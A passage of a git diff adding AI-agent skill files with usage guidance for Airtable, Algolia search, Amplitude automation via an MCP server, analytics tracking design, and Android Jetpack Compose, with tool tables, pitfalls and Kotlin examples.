- `options`: Type-specific options (choices for select, precision for number)
|
||||
- `description`: Field description
|
||||
|
||||
**Pitfalls**:
|
||||
- UPDATE_FIELD only changes name/description, NOT type/options; create a replacement field and migrate
|
||||
- Computed fields (formula, rollup, lookup) cannot be created via API
|
||||
- 422 when type options are missing or malformed
|
||||
|
||||
### 4. Manage Comments
|
||||
|
||||
**When to use**: User wants to view or add comments on records
|
||||
|
||||
**Tool sequence**:
|
||||
1. `AIRTABLE_LIST_COMMENTS` - List comments on a record [Required]
|
||||
|
||||
**Key parameters**:
|
||||
- `baseId`: Base ID
|
||||
- `tableIdOrName`: Table identifier
|
||||
- `recordId`: Record ID (17 chars, starts with 'rec')
|
||||
- `pageSize`: Comments per page (max 100)
|
||||
|
||||
**Pitfalls**:
|
||||
- Record IDs must be exactly 17 characters starting with 'rec'
|
||||
|
||||
## Common Patterns
|
||||
|
||||
### Airtable Formula Syntax
|
||||
|
||||
**Comparison**:
|
||||
- `{Status}='Done'` - Equals
|
||||
- `{Priority}>1` - Greater than
|
||||
- `{Name}!=''` - Not empty
|
||||
|
||||
**Functions**:
|
||||
- `AND({A}='x', {B}='y')` - Both conditions
|
||||
- `OR({A}='x', {A}='y')` - Either condition
|
||||
- `FIND('test', {Name})>0` - Contains text
|
||||
- `IS_BEFORE({Due Date}, TODAY())` - Date comparison
|
||||
|
||||
**Escape rules**:
|
||||
- Single quotes in values: double them (`{Name}='John''s Company'`)
|
||||
|
||||
### Pagination
|
||||
|
||||
- Set `pageSize` (max 100)
|
||||
- Check response for `offset` string
|
||||
- Pass `offset` to next request unchanged
|
||||
- Keep filters/sorts/view stable between pages
|
||||
|
||||
## Known Pitfalls
|
||||
|
||||
**ID Formats**:
|
||||
- Base IDs: `appXXXXXXXXXXXXXX` (17 chars)
|
||||
- Table IDs: `tblXXXXXXXXXXXXXX` (17 chars)
|
||||
- Record IDs: `recXXXXXXXXXXXXXX` (17 chars)
|
||||
- Field IDs: `fldXXXXXXXXXXXXXX` (17 chars)
|
||||
|
||||
**Batch Limits**:
|
||||
- CREATE_RECORDS: max 10 per request
|
||||
- UPDATE_MULTIPLE_RECORDS: max 10 per request
|
||||
- DELETE_MULTIPLE_RECORDS: max 10 per request
|
||||
|
||||
## Quick Reference
|
||||
|
||||
| Task | Tool Slug | Key Params |
|
||||
|------|-----------|------------|
|
||||
| List bases | AIRTABLE_LIST_BASES | (none) |
|
||||
| Get schema | AIRTABLE_GET_BASE_SCHEMA | baseId |
|
||||
| List records | AIRTABLE_LIST_RECORDS | baseId, tableIdOrName |
|
||||
| Get record | AIRTABLE_GET_RECORD | baseId, tableIdOrName, recordId |
|
||||
| Create record | AIRTABLE_CREATE_RECORD | baseId, tableIdOrName, fields |
|
||||
| Create records | AIRTABLE_CREATE_RECORDS | baseId, tableIdOrName, records |
|
||||
| Update record | AIRTABLE_UPDATE_RECORD | baseId, tableIdOrName, recordId, fields |
|
||||
| Update records | AIRTABLE_UPDATE_MULTIPLE_RECORDS | baseId, tableIdOrName, records |
|
||||
| Delete record | AIRTABLE_DELETE_RECORD | baseId, tableIdOrName, recordId |
|
||||
| Create field | AIRTABLE_CREATE_FIELD | baseId, tableIdOrName, name, type |
|
||||
| Update field | AIRTABLE_UPDATE_FIELD | baseId, tableIdOrName, fieldId |
|
||||
| Update table | AIRTABLE_UPDATE_TABLE | baseId, tableIdOrName, name |
|
||||
| List comments | AIRTABLE_LIST_COMMENTS | baseId, tableIdOrName, recordId |
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
71
packages/llm/skills/algolia-search/SKILL.md
Normal file
71
packages/llm/skills/algolia-search/SKILL.md
Normal file
@ -0,0 +1,71 @@
|
||||
---
|
||||
name: algolia-search
|
||||
description: "Expert patterns for Algolia search implementation, indexing strategies, React InstantSearch, and relevance tuning Use when: adding search to, algolia, instantsearch, search api, search functionality."
|
||||
risk: unknown
|
||||
source: "vibeship-spawner-skills (Apache 2.0)"
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Algolia Search Integration
|
||||
|
||||
## Patterns
|
||||
|
||||
### React InstantSearch with Hooks
|
||||
|
||||
Modern React InstantSearch setup using hooks for type-ahead search.
|
||||
|
||||
Uses react-instantsearch-hooks-web package with algoliasearch client.
|
||||
Widgets are components that can be customized with classnames.
|
||||
|
||||
Key hooks:
|
||||
- useSearchBox: Search input handling
|
||||
- useHits: Access search results
|
||||
- useRefinementList: Facet filtering
|
||||
- usePagination: Result pagination
|
||||
- useInstantSearch: Full state access
|
||||
|
||||
|
||||
### Next.js Server-Side Rendering
|
||||
|
||||
SSR integration for Next.js with react-instantsearch-nextjs package.
|
||||
|
||||
Use <InstantSearchNext> instead of <InstantSearch> for SSR.
|
||||
Supports both Pages Router and App Router (experimental).
|
||||
|
||||
Key considerations:
|
||||
- Set dynamic = 'force-dynamic' for fresh results
|
||||
- Handle URL synchronization with routing prop
|
||||
- Use getServerState for initial state
|
||||
|
||||
|
||||
### Data Synchronization and Indexing
|
||||
|
||||
Indexing strategies for keeping Algolia in sync with your data.
|
||||
|
||||
Three main approaches:
|
||||
1. Full Reindexing - Replace entire index (expensive)
|
||||
2. Full Record Updates - Replace individual records
|
||||
3. Partial Updates - Update specific attributes only
|
||||
|
||||
Best practices:
|
||||
- Batch records (ideal: 10MB, 1K-10K records per batch)
|
||||
- Use incremental updates when possible
|
||||
- partialUpdateObjects for attribute-only changes
|
||||
- Avoid deleteBy (computationally expensive)
|
||||
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | critical | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
220
packages/llm/skills/amplitude-automation/SKILL.md
Normal file
220
packages/llm/skills/amplitude-automation/SKILL.md
Normal file
@ -0,0 +1,220 @@
|
||||
---
|
||||
name: amplitude-automation
|
||||
description: "Automate Amplitude tasks via Rube MCP (Composio): events, user activity, cohorts, user identification. Always search tools first for current schemas."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Amplitude Automation via Rube MCP
|
||||
|
||||
Automate Amplitude product analytics through Composio's Amplitude toolkit via Rube MCP.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Rube MCP must be connected (RUBE_SEARCH_TOOLS available)
|
||||
- Active Amplitude connection via `RUBE_MANAGE_CONNECTIONS` with toolkit `amplitude`
|
||||
- Always call `RUBE_SEARCH_TOOLS` first to get current tool schemas
|
||||
|
||||
## Setup
|
||||
|
||||
**Get Rube MCP**: Add `https://rube.app/mcp` as an MCP server in your client configuration. No API keys needed — just add the endpoint and it works.
|
||||
|
||||
|
||||
1. Verify Rube MCP is available by confirming `RUBE_SEARCH_TOOLS` responds
|
||||
2. Call `RUBE_MANAGE_CONNECTIONS` with toolkit `amplitude`
|
||||
3. If connection is not ACTIVE, follow the returned auth link to complete Amplitude authentication
|
||||
4. Confirm connection status shows ACTIVE before running any workflows
|
||||
|
||||
## Core Workflows
|
||||
|
||||
### 1. Send Events
|
||||
|
||||
**When to use**: User wants to track events or send event data to Amplitude
|
||||
|
||||
**Tool sequence**:
|
||||
1. `AMPLITUDE_SEND_EVENTS` - Send one or more events to Amplitude [Required]
|
||||
|
||||
**Key parameters**:
|
||||
- `events`: Array of event objects, each containing:
|
||||
- `event_type`: Name of the event (e.g., 'page_view', 'purchase')
|
||||
- `user_id`: Unique user identifier (required if no `device_id`)
|
||||
- `device_id`: Device identifier (required if no `user_id`)
|
||||
- `event_properties`: Object with custom event properties
|
||||
- `user_properties`: Object with user properties to set
|
||||
- `time`: Event timestamp in milliseconds since epoch
|
||||
|
||||
**Pitfalls**:
|
||||
- At least one of `user_id` or `device_id` is required per event
|
||||
- `event_type` is required for every event; cannot be empty
|
||||
- `time` must be in milliseconds (13-digit epoch), not seconds
|
||||
- Batch limit applies; check schema for maximum events per request
|
||||
- Events are processed asynchronously; successful API response does not mean data is immediately queryable
|
||||
|
||||
### 2. Get User Activity
|
||||
|
||||
**When to use**: User wants to view event history for a specific user
|
||||
|
||||
**Tool sequence**:
|
||||
1. `AMPLITUDE_FIND_USER` - Find user by ID or property [Prerequisite]
|
||||
2. `AMPLITUDE_GET_USER_ACTIVITY` - Retrieve user's event stream [Required]
|
||||
|
||||
**Key parameters**:
|
||||
- `user`: Amplitude internal user ID (from FIND_USER)
|
||||
- `offset`: Pagination offset for event list
|
||||
- `limit`: Maximum number of events to return
|
||||
|
||||
**Pitfalls**:
|
||||
- `user` parameter requires Amplitude's internal user ID, NOT your application's user_id
|
||||
- Must call FIND_USER first to resolve your user_id to Amplitude's internal ID
|
||||
- Activity is returned in reverse chronological order by default
|
||||
- Large activity histories require pagination via `offset`
|
||||
|
||||
### 3. Find and Identify Users
|
||||
|
||||
**When to use**: User wants to look up users or set user properties
|
||||
|
||||
**Tool sequence**:
|
||||
1. `AMPLITUDE_FIND_USER` - Search for a user by various identifiers [Required]
|
||||
2. `AMPLITUDE_IDENTIFY` - Set or update user properties [Optional]
|
||||
|
||||
**Key parameters**:
|
||||
- For FIND_USER:
|
||||
- `user`: Search term (user_id, email, or Amplitude ID)
|
||||
- For IDENTIFY:
|
||||
- `user_id`: Your application's user identifier
|
||||
- `device_id`: Device identifier (alternative to user_id)
|
||||
- `user_properties`: Object with `$set`, `$unset`, `$add`, `$append` operations
|
||||
|
||||
**Pitfalls**:
|
||||
- FIND_USER searches across user_id, device_id, and Amplitude ID
|
||||
- IDENTIFY uses special property operations (`$set`, `$unset`, `$add`, `$append`)
|
||||
- `$set` overwrites existing values; `$setOnce` only sets if not already set
|
||||
- At least one of `user_id` or `device_id` is required for IDENTIFY
|
||||
- User property changes are eventually consistent; not immediate
|
||||
|
||||
### 4. Manage Cohorts
|
||||
|
||||
**When to use**: User wants to list cohorts, view cohort details, or update cohort membership
|
||||
|
||||
**Tool sequence**:
|
||||
1. `AMPLITUDE_LIST_COHORTS` - List all saved cohorts [Required]
|
||||
2. `AMPLITUDE_GET_COHORT` - Get detailed cohort information [Optional]
|
||||
3. `AMPLITUDE_UPDATE_COHORT_MEMBERSHIP` - Add/remove users from a cohort [Optional]
|
||||
4. `AMPLITUDE_CHECK_COHORT_STATUS` - Check async cohort operation status [Optional]
|
||||
|
||||
**Key parameters**:
|
||||
- For LIST_COHORTS: No required parameters
|
||||
- For GET_COHORT: `cohort_id` (from list results)
|
||||
- For UPDATE_COHORT_MEMBERSHIP:
|
||||
- `cohort_id`: Target cohort ID
|
||||
- `memberships`: Object with `add` and/or `remove` arrays of user IDs
|
||||
- For CHECK_COHORT_STATUS: `request_id` from update response
|
||||
|
||||
**Pitfalls**:
|
||||
- Cohort IDs are required for all cohort-specific operations
|
||||
- UPDATE_COHORT_MEMBERSHIP is asynchronous; use CHECK_COHORT_STATUS to verify
|
||||
- `request_id` from the update response is needed for status checking
|
||||
- Maximum membership changes per request may be limited; chunk large updates
|
||||
- Only behavioral cohorts support API membership updates
|
||||
|
||||
### 5. Browse Event Categories
|
||||
|
||||
**When to use**: User wants to discover available event types and categories in Amplitude
|
||||
|
||||
**Tool sequence**:
|
||||
1. `AMPLITUDE_GET_EVENT_CATEGORIES` - List all event categories [Required]
|
||||
|
||||
**Key parameters**:
|
||||
- No required parameters; returns all configured event categories
|
||||
|
||||
**Pitfalls**:
|
||||
- Categories are configured in Amplitude UI; API provides read access
|
||||
- Event names within categories are case-sensitive
|
||||
- Use these categories to validate event_type values before sending events
|
||||
|
||||
## Common Patterns
|
||||
|
||||
### ID Resolution
|
||||
|
||||
**Application user_id -> Amplitude internal ID**:
|
||||
```
|
||||
1. Call AMPLITUDE_FIND_USER with user=your_user_id
|
||||
2. Extract Amplitude's internal user ID from response
|
||||
3. Use internal ID for GET_USER_ACTIVITY
|
||||
```
|
||||
|
||||
**Cohort name -> Cohort ID**:
|
||||
```
|
||||
1. Call AMPLITUDE_LIST_COHORTS
|
||||
2. Find cohort by name in results
|
||||
3. Extract id for cohort operations
|
||||
```
|
||||
|
||||
### User Property Operations
|
||||
|
||||
Amplitude IDENTIFY supports these property operations:
|
||||
- `$set`: Set property value (overwrites existing)
|
||||
- `$setOnce`: Set only if property not already set
|
||||
- `$add`: Increment numeric property
|
||||
- `$append`: Append to list property
|
||||
- `$unset`: Remove property entirely
|
||||
|
||||
Example structure:
|
||||
```json
|
||||
{
|
||||
"user_properties": {
|
||||
"$set": {"plan": "premium", "company": "Acme"},
|
||||
"$add": {"login_count": 1}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Async Operation Pattern
|
||||
|
||||
For cohort membership updates:
|
||||
```
|
||||
1. Call AMPLITUDE_UPDATE_COHORT_MEMBERSHIP -> get request_id
|
||||
2. Call AMPLITUDE_CHECK_COHORT_STATUS with request_id
|
||||
3. Repeat step 2 until status is 'complete' or 'error'
|
||||
```
|
||||
|
||||
## Known Pitfalls
|
||||
|
||||
**User IDs**:
|
||||
- Amplitude has its own internal user IDs separate from your application's
|
||||
- FIND_USER resolves your IDs to Amplitude's internal IDs
|
||||
- GET_USER_ACTIVITY requires Amplitude's internal ID, not your user_id
|
||||
|
||||
**Event Timestamps**:
|
||||
- Must be in milliseconds since epoch (13 digits)
|
||||
- Seconds (10 digits) will be interpreted as very old dates
|
||||
- Omitting timestamp uses server receive time
|
||||
|
||||
**Rate Limits**:
|
||||
- Event ingestion has throughput limits per project
|
||||
- Batch events where possible to reduce API calls
|
||||
- Cohort membership updates have async processing limits
|
||||
|
||||
**Response Parsing**:
|
||||
- Response data may be nested under `data` key
|
||||
- User activity returns events in reverse chronological order
|
||||
- Cohort lists may include archived cohorts; check status field
|
||||
- Parse defensively with fallbacks for optional fields
|
||||
|
||||
## Quick Reference
|
||||
|
||||
| Task | Tool Slug | Key Params |
|
||||
|------|-----------|------------|
|
||||
| Send events | AMPLITUDE_SEND_EVENTS | events (array) |
|
||||
| Find user | AMPLITUDE_FIND_USER | user |
|
||||
| Get user activity | AMPLITUDE_GET_USER_ACTIVITY | user, offset, limit |
|
||||
| Identify user | AMPLITUDE_IDENTIFY | user_id, user_properties |
|
||||
| List cohorts | AMPLITUDE_LIST_COHORTS | (none) |
|
||||
| Get cohort | AMPLITUDE_GET_COHORT | cohort_id |
|
||||
| Update cohort members | AMPLITUDE_UPDATE_COHORT_MEMBERSHIP | cohort_id, memberships |
|
||||
| Check cohort status | AMPLITUDE_CHECK_COHORT_STATUS | request_id |
|
||||
| List event categories | AMPLITUDE_GET_EVENT_CATEGORIES | (none) |
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
405
packages/llm/skills/analytics-tracking/SKILL.md
Normal file
405
packages/llm/skills/analytics-tracking/SKILL.md
Normal file
@ -0,0 +1,405 @@
|
||||
---
|
||||
name: analytics-tracking
|
||||
description: Design, audit, and improve analytics tracking systems that produce reliable, decision-ready data.
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: '2026-02-27'
|
||||
---
|
||||
|
||||
# Analytics Tracking & Measurement Strategy
|
||||
|
||||
You are an expert in **analytics implementation and measurement design**.
|
||||
Your goal is to ensure tracking produces **trustworthy signals that directly support decisions** across marketing, product, and growth.
|
||||
|
||||
You do **not** track everything.
|
||||
You do **not** optimize dashboards without fixing instrumentation.
|
||||
You do **not** treat GA4 numbers as truth unless validated.
|
||||
|
||||
---
|
||||
|
||||
## Phase 0: Measurement Readiness & Signal Quality Index (Required)
|
||||
|
||||
Before adding or changing tracking, calculate the **Measurement Readiness & Signal Quality Index**.
|
||||
|
||||
### Purpose
|
||||
|
||||
This index answers:
|
||||
|
||||
> **Can this analytics setup produce reliable, decision-grade insights?**
|
||||
|
||||
It prevents:
|
||||
|
||||
* event sprawl
|
||||
* vanity tracking
|
||||
* misleading conversion data
|
||||
* false confidence in broken analytics
|
||||
|
||||
---
|
||||
|
||||
## 🔢 Measurement Readiness & Signal Quality Index
|
||||
|
||||
### Total Score: **0–100**
|
||||
|
||||
This is a **diagnostic score**, not a performance KPI.
|
||||
|
||||
---
|
||||
|
||||
### Scoring Categories & Weights
|
||||
|
||||
| Category | Weight |
|
||||
| ----------------------------- | ------- |
|
||||
| Decision Alignment | 25 |
|
||||
| Event Model Clarity | 20 |
|
||||
| Data Accuracy & Integrity | 20 |
|
||||
| Conversion Definition Quality | 15 |
|
||||
| Attribution & Context | 10 |
|
||||
| Governance & Maintenance | 10 |
|
||||
| **Total** | **100** |
|
||||
|
||||
---
|
||||
|
||||
### Category Definitions
|
||||
|
||||
#### 1. Decision Alignment (0–25)
|
||||
|
||||
* Clear business questions defined
|
||||
* Each tracked event maps to a decision
|
||||
* No events tracked “just in case”
|
||||
|
||||
---
|
||||
|
||||
#### 2. Event Model Clarity (0–20)
|
||||
|
||||
* Events represent **meaningful actions**
|
||||
* Naming conventions are consistent
|
||||
* Properties carry context, not noise
|
||||
|
||||
---
|
||||
|
||||
#### 3. Data Accuracy & Integrity (0–20)
|
||||
|
||||
* Events fire reliably
|
||||
* No duplication or inflation
|
||||
* Values are correct and complete
|
||||
* Cross-browser and mobile validated
|
||||
|
||||
---
|
||||
|
||||
#### 4. Conversion Definition Quality (0–15)
|
||||
|
||||
* Conversions represent real success
|
||||
* Conversion counting is intentional
|
||||
* Funnel stages are distinguishable
|
||||
|
||||
---
|
||||
|
||||
#### 5. Attribution & Context (0–10)
|
||||
|
||||
* UTMs are consistent and complete
|
||||
* Traffic source context is preserved
|
||||
* Cross-domain / cross-device handled appropriately
|
||||
|
||||
---
|
||||
|
||||
#### 6. Governance & Maintenance (0–10)
|
||||
|
||||
* Tracking is documented
|
||||
* Ownership is clear
|
||||
* Changes are versioned and monitored
|
||||
|
||||
---
|
||||
|
||||
### Readiness Bands (Required)
|
||||
|
||||
| Score | Verdict | Interpretation |
|
||||
| ------ | --------------------- | --------------------------------- |
|
||||
| 85–100 | **Measurement-Ready** | Safe to optimize and experiment |
|
||||
| 70–84 | **Usable with Gaps** | Fix issues before major decisions |
|
||||
| 55–69 | **Unreliable** | Data cannot be trusted yet |
|
||||
| <55 | **Broken** | Do not act on this data |
|
||||
|
||||
If verdict is **Broken**, stop and recommend remediation first.
|
||||
|
||||
---
|
||||
|
||||
## Phase 1: Context & Decision Definition
|
||||
|
||||
(Proceed only after scoring)
|
||||
|
||||
### 1. Business Context
|
||||
|
||||
* What decisions will this data inform?
|
||||
* Who uses the data (marketing, product, leadership)?
|
||||
* What actions will be taken based on insights?
|
||||
|
||||
---
|
||||
|
||||
### 2. Current State
|
||||
|
||||
* Tools in use (GA4, GTM, Mixpanel, Amplitude, etc.)
|
||||
* Existing events and conversions
|
||||
* Known issues or distrust in data
|
||||
|
||||
---
|
||||
|
||||
### 3. Technical & Compliance Context
|
||||
|
||||
* Tech stack and rendering model
|
||||
* Who implements and maintains tracking
|
||||
* Privacy, consent, and regulatory constraints
|
||||
|
||||
---
|
||||
|
||||
## Core Principles (Non-Negotiable)
|
||||
|
||||
### 1. Track for Decisions, Not Curiosity
|
||||
|
||||
If no decision depends on it, **don’t track it**.
|
||||
|
||||
---
|
||||
|
||||
### 2. Start with Questions, Work Backwards
|
||||
|
||||
Define:
|
||||
|
||||
* What you need to know
|
||||
* What action you’ll take
|
||||
* What signal proves it
|
||||
|
||||
Then design events.
|
||||
|
||||
---
|
||||
|
||||
### 3. Events Represent Meaningful State Changes
|
||||
|
||||
Avoid:
|
||||
|
||||
* cosmetic clicks
|
||||
* redundant events
|
||||
* UI noise
|
||||
|
||||
Prefer:
|
||||
|
||||
* intent
|
||||
* completion
|
||||
* commitment
|
||||
|
||||
---
|
||||
|
||||
### 4. Data Quality Beats Volume
|
||||
|
||||
Fewer accurate events > many unreliable ones.
|
||||
|
||||
---
|
||||
|
||||
## Event Model Design
|
||||
|
||||
### Event Taxonomy
|
||||
|
||||
**Navigation / Exposure**
|
||||
|
||||
* page_view (enhanced)
|
||||
* content_viewed
|
||||
* pricing_viewed
|
||||
|
||||
**Intent Signals**
|
||||
|
||||
* cta_clicked
|
||||
* form_started
|
||||
* demo_requested
|
||||
|
||||
**Completion Signals**
|
||||
|
||||
* signup_completed
|
||||
* purchase_completed
|
||||
* subscription_changed
|
||||
|
||||
**System / State Changes**
|
||||
|
||||
* onboarding_completed
|
||||
* feature_activated
|
||||
* error_occurred
|
||||
|
||||
---
|
||||
|
||||
### Event Naming Conventions
|
||||
|
||||
**Recommended pattern:**
|
||||
|
||||
```
|
||||
object_action[_context]
|
||||
```
|
||||
|
||||
Examples:
|
||||
|
||||
* signup_completed
|
||||
* pricing_viewed
|
||||
* cta_hero_clicked
|
||||
* onboarding_step_completed
|
||||
|
||||
Rules:
|
||||
|
||||
* lowercase
|
||||
* underscores
|
||||
* no spaces
|
||||
* no ambiguity
|
||||
|
||||
---
|
||||
|
||||
### Event Properties (Context, Not Noise)
|
||||
|
||||
Include:
|
||||
|
||||
* where (page, section)
|
||||
* who (user_type, plan)
|
||||
* how (method, variant)
|
||||
|
||||
Avoid:
|
||||
|
||||
* PII
|
||||
* free-text fields
|
||||
* duplicated auto-properties
|
||||
|
||||
---
|
||||
|
||||
## Conversion Strategy
|
||||
|
||||
### What Qualifies as a Conversion
|
||||
|
||||
A conversion must represent:
|
||||
|
||||
* real value
|
||||
* completed intent
|
||||
* irreversible progress
|
||||
|
||||
Examples:
|
||||
|
||||
* signup_completed
|
||||
* purchase_completed
|
||||
* demo_booked
|
||||
|
||||
Not conversions:
|
||||
|
||||
* page views
|
||||
* button clicks
|
||||
* form starts
|
||||
|
||||
---
|
||||
|
||||
### Conversion Counting Rules
|
||||
|
||||
* Once per session vs every occurrence
|
||||
* Explicitly documented
|
||||
* Consistent across tools
|
||||
|
||||
---
|
||||
|
||||
## GA4 & GTM (Implementation Guidance)
|
||||
|
||||
*(Tool-specific, but optional)*
|
||||
|
||||
* Prefer GA4 recommended events
|
||||
* Use GTM for orchestration, not logic
|
||||
* Push clean dataLayer events
|
||||
* Avoid multiple containers
|
||||
* Version every publish
|
||||
|
||||
---
|
||||
|
||||
## UTM & Attribution Discipline
|
||||
|
||||
### UTM Rules
|
||||
|
||||
* lowercase only
|
||||
* consistent separators
|
||||
* documented centrally
|
||||
* never overwritten client-side
|
||||
|
||||
UTMs exist to **explain performance**, not inflate numbers.
|
||||
|
||||
---
|
||||
|
||||
## Validation & Debugging
|
||||
|
||||
### Required Validation
|
||||
|
||||
* Real-time verification
|
||||
* Duplicate detection
|
||||
* Cross-browser testing
|
||||
* Mobile testing
|
||||
* Consent-state testing
|
||||
|
||||
### Common Failure Modes
|
||||
|
||||
* double firing
|
||||
* missing properties
|
||||
* broken attribution
|
||||
* PII leakage
|
||||
* inflated conversions
|
||||
|
||||
---
|
||||
|
||||
## Privacy & Compliance
|
||||
|
||||
* Consent before tracking where required
|
||||
* Data minimization
|
||||
* User deletion support
|
||||
* Retention policies reviewed
|
||||
|
||||
Analytics that violate trust undermine optimization.
|
||||
|
||||
---
|
||||
|
||||
## Output Format (Required)
|
||||
|
||||
### Measurement Strategy Summary
|
||||
|
||||
* Measurement Readiness Index score + verdict
|
||||
* Key risks and gaps
|
||||
* Recommended remediation order
|
||||
|
||||
---
|
||||
|
||||
### Tracking Plan
|
||||
|
||||
| Event | Description | Properties | Trigger | Decision Supported |
|
||||
| ----- | ----------- | ---------- | ------- | ------------------ |
|
||||
|
||||
---
|
||||
|
||||
### Conversions
|
||||
|
||||
| Conversion | Event | Counting | Used By |
|
||||
| ---------- | ----- | -------- | ------- |
|
||||
|
||||
---
|
||||
|
||||
### Implementation Notes
|
||||
|
||||
* Tool-specific setup
|
||||
* Ownership
|
||||
* Validation steps
|
||||
|
||||
---
|
||||
|
||||
## Questions to Ask (If Needed)
|
||||
|
||||
1. What decisions depend on this data?
|
||||
2. Which metrics are currently trusted or distrusted?
|
||||
3. Who owns analytics long term?
|
||||
4. What compliance constraints apply?
|
||||
5. What tools are already in place?
|
||||
|
||||
---
|
||||
|
||||
## Related Skills
|
||||
|
||||
* **page-cro** – Uses this data for optimization
|
||||
* **ab-test-setup** – Requires clean conversions
|
||||
* **seo-audit** – Organic performance analysis
|
||||
* **programmatic-seo** – Scale requires reliable signals
|
||||
|
||||
---
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
153
packages/llm/skills/android-jetpack-compose-expert/SKILL.md
Normal file
153
packages/llm/skills/android-jetpack-compose-expert/SKILL.md
Normal file
@ -0,0 +1,153 @@
|
||||
---
|
||||
name: android-jetpack-compose-expert
|
||||
description: "Expert guidance for building modern Android UIs with Jetpack Compose, covering state management, navigation, performance, and Material Design 3."
|
||||
risk: safe
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Android Jetpack Compose Expert
|
||||
|
||||
## Overview
|
||||
|
||||
A comprehensive guide for building production-quality Android applications using Jetpack Compose. This skill covers architectural patterns, state management with ViewModels, navigation type-safety, and performance optimization techniques.
|
||||
|
||||
## When to Use This Skill
|
||||
|
||||
- Use when starting a new Android project with Jetpack Compose.
|
||||
- Use when migrating legacy XML layouts to Compose.
|
||||
- Use when implementing complex UI state management and side effects.
|
||||
- Use when optimizing Compose performance (recomposition counts, stability).
|
||||
- Use when setting up Navigation with type safety.
|
||||
|
||||
## Step-by-Step Guide
|
||||
|
||||
### 1. Project Setup & Dependencies
|
||||
|
||||
Ensure your `libs.versions.toml` includes the necessary Compose BOM and libraries.
|
||||
|
||||
```kotlin
|
||||
[versions]
|
||||
composeBom = "2024.02.01"
|
||||
activityCompose = "1.8.2"
|
||||
|
||||
[libraries]
|
||||
androidx-compose-bom = { group = "androidx.compose", name = "compose-bom", version.ref = "composeBom" }
|
||||
androidx-ui = { group = "androidx.compose.ui", name = "ui" }
|
||||
androidx-ui-graphics = { group = "androidx.compose.ui", name = "ui-graphics" }
|
||||
androidx-ui-tooling-preview = { group = "androidx.compose.ui", name = "ui-tooling-preview" }
|
||||
androidx-material3 = { group = "androidx.compose.material3", name = "material3" }
|
||||
androidx-activity-compose = { group = "androidx.activity", name = "activity-compose", version.ref = "activityCompose" }
|
||||
```
|
||||
|
||||
### 2. State Management Pattern (MVI/MVVM)
|
||||
|
||||
Use `ViewModel` with `StateFlow` to expose UI state. Avoid exposing `MutableStateFlow`.
|
||||
|
||||
```kotlin
|
||||
// UI State Definition
|
||||
data class UserUiState(
|
||||
val isLoading: Boolean = false,
|
||||
val user: User? = null,
|
||||
val error: String? = null
|
||||
)
|
||||
|
||||
// ViewModel
|
||||
class UserViewModel @Inject constructor(
|
||||
private val userRepository: UserRepository
|
||||
) : ViewModel() {
|
||||
|
||||
private val _uiState = MutableStateFlow(UserUiState())
|
||||
val uiState: StateFlow<UserUiState> = _uiState.asStateFlow()
|
||||
|
||||
fun loadUser() {
|
||||
viewModelScope.launch {
|
||||
_uiState.update { it.copy(isLoading = true) }
|
||||
try {
|
||||
val user = userRepository.getUser()
|
||||
_uiState.update { it.copy(user = user, isLoading = false) }
|
||||
} catch (e: Exception) {
|
||||
_uiState.update { it.copy(error = e.message, isLoading = false) }
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 3. Creating the Screen Composable
|
||||
|
||||
Consume the state in a "Screen" composable and pass data down to stateless components.
|
||||
|
||||
```kotlin
|
||||
@Composable
|
||||
fun UserScreen(
|
||||
viewModel: UserViewModel = hiltViewModel()
|
||||
) {
|
||||
val uiState by viewModel.uiState.collectAsStateWithLifecycle()
|
||||
|
||||
UserContent(
|
||||
uiState = uiState,
|
||||
onRetry = viewModel::loadUser
|
||||
)
|
||||
}
|
||||
|
||||
@Composable
|
||||
fun UserContent(
|
||||
uiState: UserUiState,
|
||||
onRetry: () -> Unit
|
||||
) {
|
||||
Scaffold { padding ->
|
||||
Box(modifier = Modifier.padding(padding)) {
|
||||
when {
|
||||
uiState.isLoading -> CircularProgressIndicator()
|
||||
uiState.error != null -> ErrorView(uiState.error, onRetry)
|
||||
uiState.user != null -> UserProfile(uiState.user)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Type-Safe Navigation
|
||||
|
||||
Using the new Navigation Compose Type Safety (available in recent versions).
|
||||
|
||||
```kotlin
|
||||
// Define Destinations
|
||||
@Serializable
|
||||
object Home
|
||||
|
||||
@Serializable
|
||||
data class Profile(val userId: String)
|
||||
|
||||
// Setup NavHost
|
||||
@Composable
|
||||
fun AppNavHost(navController: NavHostController) {
|
||||
NavHost(navController, startDestination = Home) {
|
||||
composable<Home> {
|
||||
HomeScreen(onNavigateToProfile = { id ->
|
||||
navController.navigate(Profile(userId = id))
|
||||
})
|
||||
}
|
||||
composable<Profile> { backStackEntry ->
|
||||
val profile: Profile = backStackEntry.toRoute()
|
||||
ProfileScreen(userId = profile.userId)
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Best Practices
|
||||
|
||||
- ✅ **Do:** Use `remember` and `derivedStateOf` to minimize unnecessary calculations during recomposition.
|
||||
- ✅ **Do:** Mark data classes used in UI state as `@Immutable` or `@Stable` if they contain `List` or other unstable types to enable smart recomposition skipping.
|
||||
- ✅ **Do:** Use `LaunchedEffect` for one-off side effects (like showing a Snackbar) triggered by state changes.
|
||||
